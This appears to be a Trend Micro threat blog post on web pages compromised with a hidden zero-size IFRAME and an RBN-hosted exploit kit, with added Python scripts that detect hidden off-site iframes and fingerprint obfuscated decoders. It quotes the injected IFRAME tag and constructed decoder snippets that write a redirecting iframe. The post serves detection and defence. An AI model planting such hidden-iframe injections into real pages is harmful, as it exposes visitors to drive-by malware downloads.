TrendLabs Malware Blog - Trend Micro

    TrendLabs has identified more Web pages that have been compromised to carry an IFRAME tag that redirects visitors to a malicious IP address, from which malicious files are downloaded. The compromised Web pages, which Trend Micro detects as HTML_IFRAME.GN, are news articles about new technologies and, ironically, about the latest malware threats; one of them even carries a report on the recent Monster.com attack.

    The IFRAME tag, appended at the bottom of the compromised page and rendered invisible by its zero width and height, looks something like this:

    <iframe src='http://81.{BLOCKED}.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
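    The indicators in that tag are easy to scan for once spelled out: a frame sized to zero (or hidden through CSS) whose src points off-site, here to a bare IP address rather than a hostname. The Python scanner below is an added example, not code from the original post or from Trend Micro. The sample page, the 198.51.100.27 address in it (a documentation-range placeholder) and the scoring heuristics are constructed for this illustration.

```python
"""Scan HTML for hidden, off-site IFRAMEs (added example; heuristics are assumptions)."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a normal article with a legitimate same-site widget
# frame, plus an injected zero-size frame appended after </html>, as described
# in the post. The 198.51.100.27 address is a documentation-range placeholder.
SAMPLE_PAGE = """<html><head><title>Tech news</title></head>
<body>
<p>Article about the latest malware threats...</p>
<iframe src="/widgets/weather.html" width="300" height="200"></iframe>
</body></html>
<iframe src='http://198.51.100.27/go.php?sid=1' style='border:0px solid gray;'
WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names; unquoted
        # values such as WIDTH=0 arrive as the string "0".
        if tag == "iframe":
            self.iframes.append({name: (value or "") for name, value in attrs})


def _dimension(value):
    """Parse a width/height value like '0', '0px' or ' 1 ' into an int, else None."""
    text = value.strip().lower()
    if text.endswith("px"):
        text = text[:-2].strip()
    try:
        return int(float(text))
    except ValueError:
        return None


def is_hidden(attrs):
    """True if the frame is sized to (near) zero or hidden through CSS."""
    for key in ("width", "height"):
        size = _dimension(attrs.get(key, ""))
        if size is not None and size <= 1:
            return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def src_host(src):
    """Hostname of an iframe src, or '' for relative or empty sources."""
    return (urlparse(src.strip()).hostname or "").lower()


def is_offsite(src, page_host):
    """True if the src names a host other than the page's own."""
    host = src_host(src)
    return bool(host) and host != page_host.lower()


def is_bare_ip(src):
    """True if the src host is a literal IP address rather than a name."""
    try:
        ipaddress.ip_address(src_host(src))
        return True
    except ValueError:
        return False


def scan_html(html, page_host):
    """Return the iframes that are hidden AND point away from page_host."""
    collector = IframeCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        reasons = []
        if is_hidden(attrs):
            reasons.append("hidden")
        if is_offsite(src, page_host):
            reasons.append("off-site")
        if is_bare_ip(src):
            reasons.append("bare-ip")
        # A hidden same-site frame (e.g. a tracking pixel) is not by itself
        # evidence of compromise; require hidden plus an external indicator.
        if "hidden" in reasons and len(reasons) > 1:
            findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, "news.example.com"):
        print(finding["src"], ", ".join(finding["reasons"]))
```

    Run against the sample, the scanner ignores the visible same-site weather frame and reports only the injected one, with all three reasons. Because the injected tag sits after the closing </html>, a scanner that stops at the end of the document body would miss it; html.parser keeps consuming the stream, which is the behaviour you want here.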



    Trend Micro threat analysts report that this malicious IP address is owned by the Russian Business Network. When this attack was first reported, the downloaded files appeared to belong to the Banker Trojan family, and additional data was requested from http://75.{BLOCKED}.148/.c/o/cfg.bin. As of this writing, however, the attackers appear to have switched servers, and the IFRAME now attempts to download exploit code, detected as EXPL_EXECOD.A and EXPL_ANICMOO.GEN.


    Meanwhile, TrendLabs has also discovered a new Web threat attack kit that works much the same way as Web Attacker, Mpack, or Icepack. It is very similar to the kit discussed in The 404 Story, but this time we have found nine exploit pages instead of seven, all of which ultimately lead to the download of the malicious file VERS.PHP, which Trend Micro detects as TROJ_DLOADER.PGW.

    Based on the analysis by Senior Threat Expert Ivan Macalintal, the obfuscated scripts on the exploit pages are still undetected. To make matters worse, the n404-X HTM pages (where X is a number from 1 to 9) are regenerated every 5-10 minutes, producing ever more malicious pages (currently more than 130 sites and counting).

    Further investigation reveals that the malicious domain is again hosted by none other than the Russian Business Network. This kit also uses VBScript; this time, however, the variable names are randomized and probably differ on every visit. Threat analyst David Sancho also noted that not a single line of code was visible in the first infectious HTML. “These people are making extra efforts to prevent automated detection of JavaScript decoders,” he says.
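    Randomized variable names defeat detection that hashes the raw script, because every regeneration produces a new hash while the decoder's logic stays the same. The Python snippet below is an added example, not the original post's or Trend Micro's detection logic: it tokenizes a script, replaces string literals, numbers and renameable identifiers with placeholders, and hashes the result, so two constructed generations of a simple unescape-and-write decoder (simplified illustrations, not samples from the attack) share one fingerprint even though their raw hashes differ. The list of fixed API names is an assumption for the example.

```python
"""Fingerprint scripts by structure so renamed variables do not change the hash (added example)."""
import hashlib
import re

# Two constructed "generations" of the same simple decoder: identical logic,
# freshly randomized variable names, a different payload string and different
# whitespace. Not samples from the attack described in the post.
GENERATION_A = """var qzx="%3Cifr%61me%20src%3D%27http%3A//198.51.100.27/go.php%27%3E";
var wkp=unescape(qzx);
document.write(wkp);"""

GENERATION_B = """var a9f1 = "%3Cifr%61me%20src%3D%27http%3A//198.51.100.27/go.php%3Fsid%3D2%27%3E";
var b22c = unescape( a9f1 );
document.write( b22c );"""

# A structurally different, benign script for contrast.
UNRELATED = """var box = document.getElementById("ad");
box.style.display = "none";"""

# Identifiers an obfuscator cannot rename because the language or browser
# defines them; keeping them verbatim makes the fingerprint reflect the API
# calls used. This list is an assumption for the example, not exhaustive.
FIXED_NAMES = {
    "var", "function", "return", "new", "if", "else", "for", "while",
    "document", "window", "write", "eval", "unescape", "String",
    "fromCharCode", "charCodeAt", "length", "replace", "split", "join",
}

TOKEN_RE = re.compile(
    r'(?P<str>"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\')'  # string literal
    r"|(?P<num>\d+(?:\.\d+)?)"                           # number
    r"|(?P<ident>[A-Za-z_$][A-Za-z0-9_$]*)"              # identifier / keyword
    r"|(?P<op>\S)"                                        # any other single char
)


def normalize(script):
    """Replace literals with STR/NUM and renameable identifiers with ID0, ID1, ..."""
    renamed = {}
    tokens = []
    for match in TOKEN_RE.finditer(script):
        kind, text = match.lastgroup, match.group()
        if kind == "str":
            tokens.append("STR")
        elif kind == "num":
            tokens.append("NUM")
        elif kind == "ident" and text not in FIXED_NAMES:
            # Same placeholder on every reappearance, numbered by first use,
            # so the data flow between variables survives the rename.
            tokens.append(renamed.setdefault(text, f"ID{len(renamed)}"))
        else:
            tokens.append(text)
    return " ".join(tokens)


def raw_hash(script):
    """Plain SHA-256 of the script text; changes with every rename."""
    return hashlib.sha256(script.encode()).hexdigest()


def fingerprint(script):
    """SHA-256 of the normalized token stream; stable across variable renames."""
    return hashlib.sha256(normalize(script).encode()).hexdigest()


if __name__ == "__main__":
    print("raw hashes equal:  ", raw_hash(GENERATION_A) == raw_hash(GENERATION_B))
    print("fingerprints equal:", fingerprint(GENERATION_A) == fingerprint(GENERATION_B))
    print(normalize(GENERATION_A))
```

    The caveat is that normalization throws away the string contents, which is exactly where the payload lives, so a fingerprint like this is a triage signal for grouping generations of one kit, not a replacement for decoding the script and inspecting what it writes into the page. Engines that also reorder statements or split strings need further normalization steps on top of this one.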

    This constant regeneration makes the pages hard to catch with static signatures, since there is no way to know how many more iterations and generations of malicious scripts will be produced. Trend Micro is nonetheless continuously monitoring these sites to add all undetected scripts and binaries to its signatures. Users are advised to watch out for these sites, which are still up and running as of this writing.





    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice